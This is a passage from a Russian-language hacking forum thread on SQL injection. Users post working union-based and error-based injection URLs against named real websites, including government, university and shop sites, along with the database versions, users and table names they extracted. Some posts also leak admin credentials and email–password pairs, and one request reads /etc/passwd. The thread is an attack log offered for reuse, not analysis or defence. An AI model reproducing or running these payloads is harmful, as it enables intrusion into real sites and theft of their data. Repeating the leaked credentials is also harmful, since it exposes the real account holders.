SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46
    Code:
    http://www.nasha-spravka.ru/?abc=2&city=-129+union+select+concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29--
    spravka_2:5.1.56:spravka_2@localhost


    Code:
    http://vsemisto.com.ua/index.php?page=2&id=4643+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14,15--
    dovidka_vm:5.1.47-community-log:dovidka_user@webua1.ukrhosting.com
     
    #13801 Amoura, 27 Apr 2011
    Last edited: 27 Apr 2011
    1 person likes this.
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,418
    Likes Received:
    814
    Reputations:
    848
    5.0.86:fanfooty@localhost:fanfooty

    5.1.47-community-log:xaoonet_super@localhost:xaoonet_super

    5.0.51a:db_java_bookz@localhost:db_java_bookz
     
    _________________________
    #13802 winstrool, 27 Apr 2011
    Last edited: 27 Apr 2011
    1 person likes this.
  3. шкoльнек

    Joined:
    19 Dec 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -3
    4.1.21-log : udb5600 : Uwww5600S@localhost
     
  4. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    310
    Likes Received:
    76
    Reputations:
    19
    [​IMG]

    http://www.arabdetroit.com/news.php?id=-27335'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+config--+
    PR 5
    Хэши не расшифровал.
     
    #13804 ubi, 28 Apr 2011
    Last edited: 28 Apr 2011
  5. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    Admin31da206ea6d47ec8a5e979b6bf44d681:pedro1954

    nadeem:khan,mudit123:muditmisra,shivani@magnifix.co.nz:5767571,marc@magnifix.co.nz:2650070,mudit@magnifix.co.nz:navya28,satwinder@magnifix.co.nz:2650070,darshak@magnifix.co.nz:2650070
     
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    [​IMG]
    [​IMG]
    PR-6
    Code:
    http://www.tvigle.ru/category/cinema/video/?sort=-1884%29%29+union+select+1,2,concat_ws%280x3a,id,name,email,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tvigle_rf.be_user+limit+20,1000+--+
     
  7. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46
    Code:
    http://www.womencraftlink.net/showFoto.php?galName=galerie_6&id=134+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8--
    peyer_main:5.0.51a-24+lenny5:peyer@localhost
     
    1 person likes this.
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,742
    Likes Received:
    398
    Reputations:
    230
    linn.dlrg.de
    Code:
    http://linn.dlrg.de/termine.html?tx_dlrgterminkalender_pi1%5Baction%5D=read&tx_dlrgterminkalender_pi1%5Btid%5D=-51+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&cHash=b6bf96f6dac665abaea06aea2e150c3c
    abayan.de PR3
    Code:
    http://www.abayan.de/index.php?id=4&no_cache=1&cmode=99&pg=&mode=3&lanid=1180&anbid=1063&erzid=1180+union+select+1,2,3,4,5,id,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user+--+&cHash=f4dbe36977d98285737a48d8aa7cb3a3
    kindermissionswerk.de PR5
    Code:
    http://kindermissionswerk.de/shop/index.php?sessionid=39409321486eb6f3a00e66a0623f1e61&kat=-99+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+group+by+table_schema+limit+0,1+--+&actiontyp=artikelinwarenkorb
    neoriginal.ru ТИЦ50
    Code:
    http://www.neoriginal.ru/cat/audi/part/u/0/mod/77/kat/264/year/2004/grp/1/idcnt/15/subgrp/-24431+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+--+
    feierwerk.de PR4
    Code:
    http://feierwerk.de/angebote/dschungelpalast/programm/details.html?tx_wfqbe_pi1%5Beid%5D=1967+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+information_schema.tables+--+
    asso.angers.fr PR4
    Code:
    http://asso.angers.fr/detail_asso.php?id_asso=-5974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,login,20,21,22,23,24,25,26+from+admin+--+
    campus.igw.edu
    Code:
    http://campus.igw.edu/kursliste/kurse_detail.php?kursID=-4411+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+--+&SN=wvimqrfaf
    contrefacon-danger.com PR7
    Code:
    http://www.contrefacon-danger.com/front/show_rub.php?rub_id=260&archive=0'+union+select+1,2,3,4,5,6,unhex(hex(user())),8,9,10,11,12,13+--+
    zenar.boku.ac.at PR5
    Code:
    http://zenar.boku.ac.at/en/links/links_detail.php?ID=-1+union+select+1,2,3,4,5,6+--+
    wallawalla.edu PR5
    Code:
    http://www.wallawalla.edu/academics/library/typo3/showdescr.html?ID=-22'+union+select+1,2+--+
    site.medair.org
    Code:
    http://site.medair.org/en_portal/hr/job/job_details_hq.php?jcode=-CH_HQS_GAM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+/*+
    bioinf-applied.charite.de
    Code:
    http://bioinf-applied.charite.de/fragment_store/src/download.php?fragment_id=-374+union+select+user()+--+
    esellers-guide.de PR2
    Code:
    http://esellers-guide.de/index.php?page=view_text&type=articles&category=19&pre_category=1&text_id=-37'+union+select+1,2,3,4,5,6,7,8+--+
    fondation-saint-hubert.be PR4
    Code:
    http://www.fondation-saint-hubert.be/visu.php?cible=-18+union+select+1,2,3,4,5,6+--+
    suurmond.be PR2
    Code:
    http://www.suurmond.be/producten/groep.php?groepid=-50+union+select+1,2,3,4,5,6,7,8,9,10,11+--+&merk=0'
    dmc.metu.edu PR5
    Code:
    http://www.dmc.metu.edu/DMC/download.php?fname=./config.php
     
    2 people like this.
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,418
    Likes Received:
    814
    Reputations:
    848
    вывод в исходниках:
    zaward@zaward.com5.0.51a-3ubuntu5.8db_zaward

    5.0.89-log:u6351@be2:u6351
     
    _________________________
    #13809 winstrool, 29 Apr 2011
    Last edited: 29 Apr 2011
    2 people like this.
  10. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    PR3
    Code:
    http://www.dushka.ru/gstore.phtm?g=-11+union+select+1,version()--
    почти весь хостинг подвержен этому
     
    #13810 Melfis, 29 Apr 2011
    Last edited: 29 Apr 2011
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,418
    Likes Received:
    814
    Reputations:
    848
    PR: 4
     
    _________________________
    #13811 winstrool, 30 Apr 2011
    Last edited by a moderator: 30 Apr 2011
  12. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    EDU POWER =)

    http://www.esne.edu/noticias2.php?info=Noticias&Id=-354+union+select+1,user%28%29,3,4,5--+
     
    2 people like this.
  13. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Freece.com : PR - 4

    MSSQL VERSION:Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7600: )

    DATABASE:pharmcon
    USERNAME:pharmCon_reader
    VULN SCRIPT PATH:D:\www\FreeCE_classic\www\forum\Forum_Details.asp
    Exploit:
    IMPORTANT TABLES:
    tbEmailAddresses
    tbForum
    tbInstructors

    tblUsers
    -User_ID
    -UserName
    -Password
     
    3 people like this.
  14. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53


    .......
     
    #13814 Melfis, 30 Apr 2011
    Last edited by a moderator: 30 Apr 2011
    2 people like this.
  15. assinjeans

    assinjeans New Member

    Joined:
    30 Jan 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    http://www.azizbehich.com/news.php?id=-132+union+select+1,2,3,version(),user(),6,7,8,9,10+--
    4версия=(
     
  16. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    310
    Likes Received:
    76
    Reputations:
    19
    [​IMG]
    Code:
    http://sportpickgoods.com/view.php?id=-61738+union+select+1,concat_ws(0x3a,name,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tb_admin--+
     
    2 people like this.
  17. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    53
    Likes Received:
    53
    Reputations:
    18
    Code:
    http://www.elavik.ru/catalog.php?action=goods&id=-177+union+select+version%28%29,2+--+
    5.1.41-log
     
    1 person likes this.
  18. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    gov*no

    http://www.bryantx.gov/include/press_release.asp?id=-1107/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,user%28%29,10,11,12--+
     
    1 person likes this.
  19. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    651
    Likes Received:
    160
    Reputations:
    81
    http://portalxm.com/index.php?id=1'+and+1=0+union+select+1,2,3,group_concat(table_name+separator+0x3a),5,6,7,8,9+from+information_schema.tables+where+table_schema=0x76696e746167645f617a697a/*
     
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    тИЦ 600
    http://www.efko.ru/page.php?id=37'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version())--+

    Вывод в Location: The requested URL /newefko@localhost:newefko2:5.0.77-log was not found on this server.

    -------------------
    EDU:
    http://casgroup.fiu.edu/dll/events.php?id=459+and+1=2+union+select+1,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9--+

    casweb@GOPANTHER.fiu.edu:cas:4.1.14-nt-log

    -------------------

    http://globalanuncio.com/view.php?id=56688+and+1=2+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14,15,16,17,18,19,20,21--+

    globaldbuser@localhost:5.0.77:globalanuncio

    -------------------

    http://onlineoffshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb'+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database())--+

    calculator@cgi1401.int.bizland.net:5.0.91-log:eek:nlineoffshoredb

    ------------------

    http://pole1.ru/tovar.php?id=8+and+1=2+union+select+1,2,UNHEX(HEX(concat_ws(0x3a,user(),version(),database()))),4,5,6,7--+

    aqq7328_strina@localhost:5.0.92-community-log:aqq7328_lopata

    "Чудо лопата" :D

    --------------------

    Шоп

    http://www.arttoframes.com/cartmanager_search.php?parent_sku=cdm-144-FRBW26061&size=36x12&color=215'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+

    Duplicate entry '5.0.451' for key 1

    -----------------

    http://www.bienesonline.com/venezuela/inmobiliarias.php?ID=15+and+1=2+union+select+concat_ws(0x3a,user(),version(),database())--+

    admin_bieneson@localhost:5.0.67-community-log:admin_bienes_venezuela

    -----------------

    http://www.birdjam.com/article.php?gid=0'&hilow=asc&monyr=4-2011&page=twitch_hiscores'+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11--+

    birdjam2@localhost:5.0.27:birdjam2

    -----------------

    http://www.cymbalhouse.com/shopping/pgm-more_information.php?id=1602'+and+1=2+/*!UnIon*/+selECt+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--+

    zilze3_sope1@localhost:5.1.52:zilze3_sope1

    -------------------

    ВсеМайки.РУ - крупный сайт по продаже футболок со своей ПП.

    http://www.vsemayki.ru/basket_to.php?id=795'+and+1=2+union+select+concat_ws(0x3a,user(),version(),database()),2--+&color=red&size=M%20%2846-48%29&model=man&hand=short&num=1

    vsemayki_ru@server.vsemayki.ru:5.1.50-rel11.4-log:vsemayki_ru

    ------------------

    http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15--+

    smdaily2@localhost:4.0.25:smdaily2
     
    #13820 Tigger, 2 May 2011
    Last edited: 2 May 2011
    4 people like this.
Loading...
Thread Status:
Not open for further replies.